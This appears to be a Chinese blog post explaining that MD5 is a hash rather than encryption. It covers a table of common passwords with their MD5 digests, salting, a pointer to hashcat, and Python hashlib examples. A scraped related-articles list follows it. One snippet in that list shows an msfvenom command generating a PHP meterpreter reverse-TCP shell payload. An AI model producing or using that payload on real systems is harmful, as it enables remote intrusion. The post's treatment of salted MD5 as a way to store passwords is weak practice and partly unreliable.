MD5不是加密

https://draveness.me/whys-the-design-password-with-md5/ 参考为什么这么设计

  • Message-Digest Algorithm 5:信息摘要算法

  • MD5 并不是一种加密算法,我们也可以叫它哈希函数

  • 世界上最常见的20个密码,类似建立一个彩虹表进行碰撞,以达到解密的效果。

    RANK 2021 MD5值(32位小写)
    1 123456 e10adc3949ba59abbe56e057f20f883e
    2 123456789 25f9e794323b453885f5181f1b624d0b
    3 12345 827ccb0eea8a706c4c34a16891f84e7b
    4 qwerty d8578edf8458ce06fbc5bb76a58c5ca4
    5 password 5f4dcc3b5aa765d61d8327deb882cf99
    6 12345678 25d55ad283aa400af464c76d713c07ad
    7 111111 96e79218965eb72c92a549dd5a330112
    8 123123 4297f44b13955235245b2497399d7a93
    9 1234567890 e807f1fcf82d132f9bb018ca6738a19f
    10 1234567 fcea920f7412b5da7be0cf42b8c93759
    11 qwerty123 3fc0a7acf087f549ac2b266baf94b8b1
    12 000000 670b14728ad9902aecba32e22fa4f6bd
    13 1q2w3e 3fde6bb0541387e4ebdadf7c2ff31123
    14 aa12345678 d4f2a60315eef2b600cf0240ac0c37ad
    15 abc123 e99a18c428cb38d5f260853678922e03
    16 password1 7c6a180b36896a0a8c02787eeafb0e4c
    17 1234 81dc9bdb52d04dc20036dbd8313ed055
    18 qwertyuiop 6eea9b7ef19179a06954edd0f6c05ceb
    19 123321 c8837b23ff8aaa8a2dde915473ce0991
    20 password123 482c811da5d5b4bc6d497ffa98491e38

  • 为什么说MD5不是加密呢?

    • 数据源是无穷尽的,而 MD5密文是有限的。所以不存在MD5解密。
    • MD5 哈希的信息无法被还原,只依靠 MD5 是无法完成加密的。

  • 哈希加盐salt

    • 在原始字符串的基础上增加一个字符串,得到一个新的"密码"。
    • /etc/passwd早期就是这么存储密码的

  • 密码的破解(哈希碰撞)

    • 攻击者其实不需要知道用户的密码是什么,他只需要找到一个值 value,这个值加盐后的哈希与密码加盐后的哈希完全一致就能登录用户的账号
    • 可以了解下hashcat(github搜)

Python中的MD5"加密"

  • 加密

    import hashlib
    
ori_pwd = '123456'
    
byte_ori_pwd = ori_pwd.encode('utf-8')  #bytes对象
    
print(hashlib.md5(byte_ori_pwd).hexdigest())
    
#e10adc3949ba59abbe56e057f20f883e  都是这个
    
print(hashlib.md5(b'123456').hexdigest())

  • 得到的是32位小写,如果要32位大写、16位大小写,那就简单处理下

    import hashlib
    
ori_pwd = '123456'
    
byte_ori_pwd = ori_pwd.encode('utf-8')
    
print('32位小写: ',hashlib.md5(byte_ori_pwd).hexdigest())
    
print('32位大写: ',hashlib.md5(byte_ori_pwd).hexdigest().upper())
    
print('16位小写: ',hashlib.md5(byte_ori_pwd).hexdigest()[8:-8])
    
print('16位大写: ',hashlib.md5(byte_ori_pwd).hexdigest()[8:-8].upper())

  • 加盐

    import hashlib
    
def get_md5(ori_str:str,salt:str='',mode:str='1') -> str:
    
    """
    
    获取字符串的MD加密后的信息
    
    :param ori_str: 原始字符串
    
    :param salt: 盐值
    
    :param mode: 1=32小  2=32大 3=16小 4=16大
    
    :return: MD5后的字符串
    
    """
    
    md5_password = hashlib.md5((ori_str+salt).encode('utf-8')).hexdigest()
    
    if mode == '1':
    
        return md5_password
    
    if mode == '2':
    
        return md5_password.upper()
    
    if mode == '3':
    
        return md5_password[8:-8]
    
    if mode == '4':
    
        return md5_password[8:-8].upper()
    
    raise Exception(f'unsupport mode {mode},only support 1,2,3,4(1=32小  2=32大 3=16小 4=16大)')
    
print('不加盐:',get_md5('123456'))
    
print('加盐:',get_md5('123456',salt='nanjing'))
    
print('不加盐:',get_md5('123456'))
    
print('不加盐16位小写:',get_md5('123456',salt='nanjing',mode='3'))
    
print('不加盐16位小写:',get_md5('123456',salt='nanjing',mode='5'))

MD5在Python中的简单使用的更多相关文章

  1. python中一个简单的webserver

     python中一个简单的webserver 2013-02-24 15:37:49 分类: Python/Ruby 支持多线程的webserver   1 2 3 4 5 6 7 8 9 10 11 ...

  2. Python 中lambda 简单介绍

    转自:https://www.cnblogs.com/AlwaysWIN/p/6202320.html 在学习python的过程中,lambda的语法经常出现,现在将它整理一下,以备日后查看. 1.l ...

  3. 正则表达式在python中的简单使用

    正则表达式独立与编程语言,基本上所有的编程语言都实现了正则表达式的相关操作.在Python中正则表达式的表现为re模块: import re 其操作有三个方法: my_string = "h ...

  4. Python中实现简单的插件框架

    在系统设计中,经常我们希望设计一套插件机制,在不修改程序主体情况下,动态去加载附能. 我设想的插件系统: 1.通过类来实现 2.自动查找和导入 我们假设需要实现一个简单的插件系统,插件可以接收一个参数 ...

  5. elasticsearch基础及在Python中的简单使用

    目录 一. 安装java环境与elasticsearch.kibana 二. elasticsearch.kibana的部分文件说明 三. Kibana的Dev tools中ES的简单命令 四. ES ...

  6. python中HTMLParser简单理解

    找一个网页,例如https://www.python.org/events/python-events/,用浏览器查看源码并复制,然后尝试解析一下HTML,输出Python官网发布的会议时间.名称和地 ...

  7. python中最简单的多进程程序

    学着.. #!/usr/bin/env python # -*- coding: utf-8 -*- # Spawn a Process: Chapter 3: Process Based Paral ...

  8. Python中最简单快捷的输出方式

    格式化输出最简单的方式之哑巴填充公式 name=ludundun age=25 print(f'hello {name},your age is {age}') 输出内容: hello ludundu ...

  9. python中property简单使用与实现

    property简单使用 class P: """ property简单使用 """ def __init__(self,name): se ...

  10. Python中的简单实现UDP协议没有粘包问题

    服务端: import socket server=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) #数据报协议->udp server.bind ...

随机推荐

  1. 如何正确遵守 Python 代码规范

    前言 无规矩不成方圆,代码亦是如此,本篇文章将会介绍一些自己做项目时遵守的较为常用的 Python 代码规范. 命名 大小写 模块名写法: module_name 包名写法: package_name ...

  2. centos ssh 连接缓慢

    在连接apache,ssh,mysql等服务器时,如果出现连接过慢,可能的原因是dns 的反向查询.反向解析是防止假冒的IP连接服务器,把IP解析成域名,来提高安全性,看这个IP是否是伪造,这是dns ...

  3. VMware 虚拟机打开电源失败

    vmware上虚拟机关机导出ovf失败后,再次启动虚拟机,突然无法打开虚拟机,并伴随如下报错: 模块"disk"打开电源失败,无法打开磁盘/***/.../***.vmdk 解决方 ...

  4. 重要内置函数、常见内置函数、可迭代对象、迭代器对象、for循环的本质、异常捕获处理

    重要内置函数 #zip拉链 zip 函数是可以接收多个可迭代对象,然后把每个可迭代对象中的第i个元素组合在一起,形成一个新的迭代器,类型为元组. l1 = [11, 22, 33] l2 = ['a' ...

  5. i春秋Backdoor

    点开是道没有任何窗口的题,右键查看源码也没上面东西,抓包试试,也没找到什么提示性的信息,根据提示去看看敏感文件泄露是什么吧 这里找到了篇敏感文件泄露的介绍及利用方法:https://www.cnblo ...

  6. linux内核源码下载地址

    一.官网链接 https://www.kernel.org/ 二.HTTP https://www.kernel.org/pub/ 三.GIT https://git.kernel.org/ 四.镜像 ...

  7. 【kafka】JDBC source&sink connect实现数据从Oracle实时同步插入更新到PostgreSQL(PG)

    〇.所需资料 1.JDBC connect的plugins下载地址(confluent) 一.Oracle建表 1.表规划 表名:Test_TimeFormat_Order.Test_Stress_O ...

  8. 【ubuntu】解决无法打开终端:gnome-terminal找不到路径问题

    因为之前安装pyton的时候把电脑本身的python路径给改了,所以出现了这样的问题:图形化启动系统自带终端时,报错找不到gnome-terminal的路径 后来找到解决方法: 先桌面右键-终端(E) ...

  9. 自研ORM框架 实现类似EF Core Include 拆分查询 支持自定义条件、排序、选择

    Baozi, I'm Mr.Zhong I like to brush TikTok, I know that anchors like to call it that, haha!Recently, ...

  10. 监控Windows(生成php木马)

    sudo su 生成木马: msfvenom --platform php -p php/meterpreter/reverse_tcp lhost=192.168.1.9 lport=55555 R ...